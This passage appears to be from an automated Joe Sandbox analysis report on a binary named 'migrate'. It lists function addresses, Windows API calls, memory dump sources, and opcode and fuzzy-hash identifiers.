                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: ffd1d867f96fd91492127e8bfd5f4eb7ba9d0eb28f84b7641e80ef66fe481695
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffd1d867f96fd91492127e8bfd5f4eb7ba9d0eb28f84b7641e80ef66fe481695
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    Function 0012E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 406ac1f8441996184449c47f8c127304cfb4d6b23647e4b431d1237d3dee3c03
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 406ac1f8441996184449c47f8c127304cfb4d6b23647e4b431d1237d3dee3c03
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    Function 0012E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 2137025c7198576aba6d4c0569c45a9dd1cfa86860ed1092e5159c9e44f371a2
                                                                                                                                                                                                    • Instruction ID: c3379399df343364ed4de91d0fa5fd3f8eb4abdb62c4c20d483453959bbaa262
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2137025c7198576aba6d4c0569c45a9dd1cfa86860ed1092e5159c9e44f371a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A011CA2EA0203C300C22A03C02C3B028CC0E2B22333822EF80080080BA80082808B0
                                                                                                                                                                                                    Function 0012E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8ead81d3de9bc94d8a3e5ecca695169c138cbf6305034c2f76023259216aaf26
                                                                                                                                                                                                    • Instruction ID: 6a30b7bbcfed23ecb505be31eec273525af1172093ca097f7776d968cbbc6d4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ead81d3de9bc94d8a3e5ecca695169c138cbf6305034c2f76023259216aaf26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42A011CA2AA022BC300822003C02C3B028CC0C2F20332882EF80A88080BA800C2008B0
                                                                                                                                                                                                    Function 0012E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 0775e98862352f0cc2f11b87000ea0a4e24343d2351125bd4eefd848dc504c5e
                                                                                                                                                                                                    • Instruction ID: 1dd7798b3ff9ea99d140b988f5f77103d75b29fa4ca413b926790e592c35f657
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0775e98862352f0cc2f11b87000ea0a4e24343d2351125bd4eefd848dc504c5e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9A011CA2AA022BC300C22A03C02C3B028CC0C2B20333882EF80280080BA80082808B0
                                                                                                                                                                                                    Function 0012E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 7d1cc31f401230bb1f1157181a52cc6c53124696d4e175b352d3ea619e820a3e
                                                                                                                                                                                                    • Instruction ID: 1dd7798b3ff9ea99d140b988f5f77103d75b29fa4ca413b926790e592c35f657
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d1cc31f401230bb1f1157181a52cc6c53124696d4e175b352d3ea619e820a3e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9A011CA2AA022BC300C22A03C02C3B028CC0C2B20333882EF80280080BA80082808B0
                                                                                                                                                                                                    Function 00119F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(?,0011903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00119F0C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                                                                                    • Opcode ID: 4932d600f70848210ab594628899c8dbeeb911f9986da861a7bc93c7af3dc710
                                                                                                                                                                                                    • Instruction ID: f60021cbfabdf64f9bee338f007feaa06faf79cce36f719f870067c34d177de4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4932d600f70848210ab594628899c8dbeeb911f9986da861a7bc93c7af3dc710
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EA0113808000A8A8E002B30CA0800C3B20EB22BC030002A8A00ACB8B2CB22888B8A00
                                                                                                                                                                                                    Function 0012AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0012AE72,c:\programdata,00000000,0015946A,00000006), ref: 0012AC08
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentDirectory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1611563598-0
                                                                                                                                                                                                    • Opcode ID: cbd4d7d78826e9aff445ab27f7a742b805c431aba1c7ac70c7fd21cff0a19a82
                                                                                                                                                                                                    • Instruction ID: 6e52fa4453cd768cb6658335a2a886a0ea09ec0a12f8c2025afabf87e04080b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd4d7d78826e9aff445ab27f7a742b805c431aba1c7ac70c7fd21cff0a19a82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88A011302002808BA2000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C8B0AA00
                                                                                                                                                                                                    Function 00119620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,001195D6,?,?,?,?,?,00142641,000000FF), ref: 0011963B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                    • Opcode ID: 907e608b3941dcfa7393aa97da247bc1733edc2789f5a572fdef51dd7b7b9bb1
                                                                                                                                                                                                    • Instruction ID: 8eec100022667989e793190c37e09525802cfeb74c6a7d23e6eaa1eb38907995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907e608b3941dcfa7393aa97da247bc1733edc2789f5a572fdef51dd7b7b9bb1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F08270485B159FDB398A24C868BD2B7E9AB22325F041B2ED4F6439E0D76169CDCA60

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 0012C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0012C2B1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0012C2C4
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0012C2E0
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0012C2E7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0012C321
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0012C358
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0012C36E
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0012C38C
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C39C
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0012C3B8
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0012C3D4
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C404
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0012C417
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0012C41E
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C477
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0012C48A
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0012C4A7
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0012C4C7
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0012C4D7
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0012C4F1
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0012C509
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C535
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0012C548
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0012C59C
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0012C5AF
                                                                                                                                                                                                      • Part of subcall function 0012AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0012AF35
                                                                                                                                                                                                      • Part of subcall function 0012AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0014E72C,?,?), ref: 0012AF84
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                                                                                                    • Opcode ID: 1fa936ea2962a2c17fe22897ec16212704e4289c7a3b5bdfdfb7fbfb116174c6
                                                                                                                                                                                                    • Instruction ID: 48ec092da80440dea94c88bceed2196c5a2da8aa38b62d442191a9c10070396b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fa936ea2962a2c17fe22897ec16212704e4289c7a3b5bdfdfb7fbfb116174c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0791A272248354BBD221DBA0DC49FFF77ACEB4AB00F404819F789D6491DB75E6448B62
                                                                                                                                                                                                    Function 0012F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0012F844
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0012F910
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0012F930
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0012F93A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                    • Opcode ID: 5bd270cc73fab42c5f6134dd2fa6e57f254fcade48a0a63e86c85eec9112293f
                                                                                                                                                                                                    • Instruction ID: 852e6b6546cb39d64d53aaa4b2a4a5920753ae7b9ca9390813ba275b8c43a499
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bd270cc73fab42c5f6134dd2fa6e57f254fcade48a0a63e86c85eec9112293f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C312A75D0522D9BDF20DFA4E9897CCBBB8AF18704F1041EAE40CAB250EB719B858F44
                                                                                                                                                                                                    Function 00116FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00116FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117013
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00117084
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00117AAB
                                                                                                                                                                                                      • Part of subcall function 00117A9C: GetLastError.KERNEL32 ref: 00117AF1
                                                                                                                                                                                                      • Part of subcall function 00117A9C: CloseHandle.KERNEL32(?), ref: 00117B00
                                                                                                                                                                                                      • Part of subcall function 0011A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641,000000FF), ref: 0011A1F1
                                                                                                                                                                                                      • Part of subcall function 0011A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0011977F,?,?,001195CF,?,?,?,?,?,00142641), ref: 0011A21F
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00117139
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00117155
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00117298
                                                                                                                                                                                                      • Part of subcall function 00119DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001173BC,?,?,?,00000000), ref: 00119DBC
